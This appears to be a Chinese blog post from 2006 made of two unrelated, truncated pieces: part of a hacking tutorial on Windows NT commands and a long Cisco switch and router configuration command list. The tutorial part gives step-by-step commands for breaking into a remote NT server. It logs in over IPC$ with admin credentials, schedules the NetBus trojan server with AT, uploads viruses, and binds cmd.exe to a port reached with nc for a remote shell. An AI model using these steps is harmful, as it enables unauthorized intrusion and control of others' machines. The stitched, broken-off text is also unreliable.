    命令会被排定在本机上运行。 
    id 指定给排定进度命令的识别号。 
    /delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的 
    命令都会被删除。 
    /yes 用于删除所有作业,且不想在运行删除时显示确认 
    信息 。 
    time 指定命令运行的时间。 
    /interactive 允许作业在运行时,与用户通过桌面交互。 
    /every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。 
    如果省略日期,则默认为在每月的本日运行。 
    /next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。 
    如果省略日期,则默认为在每月的本日运行。 
    "command" 准备运行的 Windows NT 命令或批处理文件。 
    知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe: 
    1 利用管理员登陆到目的服务器,方法为: net use x.x.x.xipc¥ "adminpwd" /user:"adminuser"(这里具体方法可参见KILLUSA的文章《HOW TO GET IN NT》) 
    2 利用ntsrv.exe启动远程: netsvc x.x.x.x schedule /start 
    3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后: 
    at x.x.x.x 00:00 ntsrv.exe /port:64321 
    其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:》winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功: 
    Microsoft(R) Windows NT(TM) 
    (C) Copyright 1985-1996 Microsoft Corp. 
    C:》 
    注:这里有一小段是抄KILLUSA的文章--别找我要稿费啊^&^ 

    6.netstat 这是一个观察网络连接状态的实用工具。 
    它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下: 
    Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接) 
    NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 
    -a Displays all connections and listening ports.(显示所有连接和监听端口) 
    -e Displays Ethernet statistics. This may be combined with the -s 
    option.(显示以太连接,可以与-s连用) 
    -n Displays addresses and port numbers in numeri
    Switching 命令大全  

    1. 在基于IOS的交换机上设置主机名/系统名: 
    switch(config)# hostname hostname 
    在基于CLI的交换机上设置主机名/系统名: 
    switch(enable) set system name name-string 

    2.在基于IOS的交换机上设置登录口令: 
    switch(config)# enable password level 1 password 
    在基于CLI的交换机上设置登录口令: 
    switch(enable) set password 
    switch(enable) set enalbepass 

    3.在基于IOS的交换机上设置远程访问: 
    switch(config)# interface vlan 1 
    switch(config-if)# ip address ip-address netmask 
    switch(config-if)# ip default-gateway ip-address 
    在基于CLI的交换机上设置远程访问: 
    switch(enable) set interface sc0 ip-address netmask broadcast-address 
    switch(enable) set interface sc0 vlan 
    switch(enable) set ip route default gateway 

    4.在基于IOS的交换机上启用和浏览CDP信息: 
    switch(config-if)# cdp enable 
    switch(config-if)# no cdp enable 
    为了查看Cisco邻接设备的CDP通告信息: 
    switch# show cdp interface [type modle/port] 
    switch# show cdp neighbors [type module/port] [detail] 
    在基于CLI的交换机上启用和浏览CDP信息: 
    switch(enable) set cdp {enable|disable} module/port 
    为了查看Cisco邻接设备的CDP通告信息: 
    switch(enable) show cdp neighbors[module/port] [vlan|duplex|capabilities|detail] 

    5.基于IOS的交换机的端口描述: 
    switch(config-if)# description description-string 
    基于CLI的交换机的端口描述: 
    switch(enable)set port name module/number description-string 

    6.在基于IOS的交换机上设置端口速度: 
    switch(config-if)# speed{10|100|auto} 
    在基于CLI的交换机上设置端口速度: 
    switch(enable) set port speed moudle/number {10|100|auto} 
    switch(enable) set port speed moudle/number {4|16|auto} 

    7.在基于IOS的交换机上设置以太网的链路模式: 
    switch(config-if)# duplex {auto|full|half} 
    在基于CLI的交换机上设置以太网的链路模式: 
    switch(enable) set port duplex module/number {full|half} 

    8.在基于IOS的交换机上配置静态VLAN: 
    switch# vlan database 
    switch(vlan)# vlan vlan-num name vla 
    switch(vlan)# exit 
    switch# configure teriminal 
    switch(config)# interface interface module/number 
    switch(config-if)# switchport mode access 
    switch(config-if)# switchport access vlan vlan-num 
    switch(config-if)# end 
    在基于CLI的交换机上配置静态VLAN: 
    switch(enable) set vlan vlan-num [name name] 
    switch(enable) set vlan vlan-num mod-num/port-list 

    9. 在基于IOS的交换机上配置VLAN中继线: 
    switch(config)# interface interface mod/port 
    switch(config-if)# switchport mode trunk 
    switch(config-if)# switchport trunk encapsulation {isl|dotlq} 
    switch(config-if)# switchport trunk allowed vlan remove vlan-list 
    switch(config-if)# switchport trunk allowed vlan add vlan-list 
    在基于CLI的交换机上配置VLAN中继线: 
    switch(enable) set trunk module/port [on|off|desirable|auto|nonegotiate] 
    Vlan-range [isl|dotlq|dotl0|lane|negotiate] 

    10.在基于IOS的交换机上配置VTP管理域: 
    switch# vlan database 
    switch(vlan)# vtp domain domain-name 
    在基于CLI的交换机上配置VTP管理域: 
    switch(enable) set vtp [domain domain-name] 

    11.在基于IOS的交换机上配置VTP 模式: 
    switch# vlan database 
    switch(vlan)# vtp domain domain-name 
    switch(vlan)# vtp {sever|cilent|transparent} 
    switch(vlan)# vtp password password 
    在基于CLI的交换机上配置VTP 模式: 
    switch(enable) set vtp [domain domain-name] [mode{ sever|cilent|transparent }][password password] 

    12. 在基于IOS的交换机上配置VTP版本: 
    switch# vlan database 
    switch(vlan)# vtp v2-mode 
    在基于CLI的交换机上配置VTP版本: 
    switch(enable) set vtp v2 enable 

    13. 在基于IOS的交换机上启动VTP剪裁: 
    switch# vlan database 
    switch(vlan)# vtp pruning 
    在基于CL I 的交换机上启动VTP剪裁: 
    switch(enable) set vtp pruning enable 

    14.在基于IOS的交换机上配置以太信道: 
    switch(config-if)# port group group-number [distribution {source|destination}] 
    在基于CLI的交换机上配置以太信道: 
    switch(enable) set port channel moudle/port-range mode{on|off|desirable|auto} 

    15.在基于IOS的交换机上调整根路径成本: 
    switch(config-if)# spanning-tree [vlan vlan-list] cost cost 
    在基于CLI的交换机上调整根路径成本: 
    switch(enable) set spantree portcost moudle/port cost 
    switch(enable) set spantree portvlancost moudle/port [cost cost][vlan-list] 

    16.在基于IOS的交换机上调整端口ID: 
    switch(config-if)# spanning-tree[vlan vlan-list]port-priority port-priority 
    在基于CLI的交换机上调整端口ID: 
    switch(enable) set spantree portpri {mldule/port}priority 
    switch(enable) set spantree portvlanpri {module/port}priority [vlans] 

    17. 在基于IOS的交换机上修改STP时钟: 
    switch(config)# spanning-tree [vlan vlan-list] hello-time seconds 
    switch(config)# spanning-tree [vlan vlan-list] forward-time seconds 
    ` switch(config)# spanning-tree [vlan vlan-list] max-age seconds 
    在基于CLI的交换机上修改STP时钟: 
    switch(enable) set spantree hello interval[vlan] 
    switch(enable) set spantree fwddelay delay [vlan] 
    switch(enable) set spantree maxage agingtiame[vlan] 

    18. 在基于IOS的交换机端口上启用或禁用Port Fast 特征: 
    switch(config-if)#spanning-tree portfast 
    在基于CLI的交换机端口上启用或禁用Port Fast 特征: 
    switch(enable) set spantree portfast {module/port}{enable|disable} 

    19. 在基于IOS的交换机端口上启用或禁用UplinkFast 特征: 
    switch(config)# spanning-tree uplinkfast [max-update-rate pkts-per-second] 
    在基于CLI的交换机端口上启用或禁用UplinkFast 特征: 
    switch(enable) set spantree uplinkfast {enable|disable}[rate update-rate] [all-protocols off|on] 

    20. 为了将交换机配置成一个集群的命令交换机,首先要给管理接口分配一个IP地址,然后使用下列命令: switch(config)# cluster enable cluster-name 

    21. 为了从一条中继链路上删除VLAN,可使用下列命令: 
    switch(enable) clear trunk module/port vlan-range 

    22. 用show vtp domain 显示管理域的VTP参数. 
    23. 用show vtp statistics显示管理域的VTP参数. 
    24. 在Catalyst交换机上定义TrBRF的命令如下: 
    switch(enable) set vlan vlan-name [name name] type trbrf bridge bridge-num[stp {ieee|ibm}] 
    25. 在Catalyst交换机上定义TrCRF的命令如下: 
    switch (enable) set vlan vlan-num [name name] type trcrf 
    {ring hex-ring-num|decring decimal-ring-num} parent vlan-num 
    26. 在创建好TrBRF VLAN之后,就可以给它分配交换机端口.对于以太网交换,可以采用如下命令给VLAN分配端口: 
    switch(enable) set vlan vlan-num mod-num/port-num 
    27. 命令show spantree显示一个交换机端口的STP状态. 
    28. 配置一个ELAN的LES和BUS,可以使用下列命令: 
    ATM (config)# interface atm number.subint multioint 
    ATM(config-subif)# lane serber-bus ethernet elan-name 

    29. 配置LECS: 
    ATM(config)# lane database database-name 
    ATM(lane-config-databade)# name elan1-name server-atm-address les1-nsap-address 
    ATM(lane-config-databade)# name elan2-name server-atm-address les2-nsap-address 
    ATM(lane-config-databade)# name … 

    30. 创建完数据库后,必须在主接口上启动LECS.命令如下: 
    ATM(config)# interface atm number 
    ATM(config-if)# lane config database database-name 
    ATM(config-if)# lane config auto-config-atm-address 

    31. 将每个LEC配置到一个不同的ATM子接口上.命令如下: 
    ATM(config)# interface atm number.subint multipoint 
    ATM(config)# lane client ethernet vlan-num elan-num 
    32. 用show lane server 显示LES的状态. 
    33. 用show lane bus显示bus的状态. 
    34. 用show lane database显示LECS数据库可内容. 
    35. 用show lane client显示LEC的状态. 
    36. 用show module显示已安装的模块列表. 
    37. 用物理接口建立与VLAN的连接: 
    router# configure terminal 
    router(config)# interface media module/port 
    router(config-if)# description description-string 
    router(config-if)# ip address ip-addr subnet-mask 
    router(config-if)# no shutdown 
    38. 用中继链路来建立与VLAN的连接: 
    router(config)# interface module/port.subinterface 
    router(config-ig)# encapsulation[isl|dotlq] vlan-number 
    router(config-if)# ip address ip-address subnet-mask 

    39. 用LANE 来建立与VLAN的连接: 
    router(config)# interface atm module/port 
    router(config-if)# no ip address 
    router(config-if)# atm pvc 1 0 5 qsaal 
    router(config-if)# atm pvc 2 0 16 ilni 
    router(config-if)# interface atm module/port.subinterface multipoint 
    router(config-if)# ip address ip-address subnet-mask 
    router(config-if)# lane client ethernet elan-num 
    router(config-if)# interface atm module/port.subinterface multipoint 
    router(config-if)# ip address ip-address subnet-name 
    router(config-if)# lane client ethernet elan-name 
    router(config-if)# … 

    40. 为了在路由处理器上进行动态路由配置,可以用下列IOS命令来进行: 
    router(config)# ip routing 
    router(config)# router ip-routing-protocol 
    router(config-router)# network ip-network-number 
    router(config-router)# network ip-network-number

    41. 配置默认路由: 
    switch(enable) set ip route default gateway 
    42. 为一个路由处理器分配VLANID,可在接口模式下使用下列命令: 
    router(config)# interface interface number 
    router(config-if)# mls rp vlan-id vlan-id-num 
    43. 在路由处理器启用MLSP: 
    router(config)# mls rp ip 
    44. 为了把一个外置的路由处理器接口和交换机安置在同一个VTP域中: 
    router(config)# interface interface number 
    router(config-if)# mls rp vtp-domain domain-name 
    45. 查看指定的VTP域的信息: 
    router# show mls rp vtp-domain vtp domain name 
    46. 要确定RSM或路由器上的管理接口,可以在接口模式下输入下列命令: 
    router(config-if)#mls rp management-interface 
    47. 要检验MLS-RP的配置情况: 
    router# show mls rp 
    48. 检验特定接口上的MLS配置: 
    router# show mls rp interface interface number 
    49. 为了在MLS-SE上设置流掩码而又不想在任一个路由处理器接口上设置访问列表: 
    set mls flow [destination|destination-source|full] 
    50. 为使MLS和输入访问列表可以兼容,可以在全局模式下使用下列命令: 
    router(config)# mls rp ip input-acl 
    51. 当某个交换机的第3层交换失效时,可在交换机的特权模式下输入下列命令: 
    switch(enable) set mls enable 
    52. 若想改变老化时间的值,可在特权模式下输入以下命令: 
    switch(enable) set mls agingtime agingtime 
    53. 设置快速老化: 
    switch(enable) set mls agingtime fast fastagingtime pkt_threshold 
    54. 确定那些MLS-RP和MLS-SE参与了MLS,可先显示交换机引用列表中的内容再确定: 
    switch(enable) show mls include 
    55. 显示MLS高速缓存记录: 
    switch(enable) show mls entry 
    56. 用命令show in arp显示ARP高速缓存区的内容。 
    57. 要把路由器配置为HSRP备份组的成员,可
     发表于2006-04-26 17:26:42 603 人阅读 0 条评论

给我留言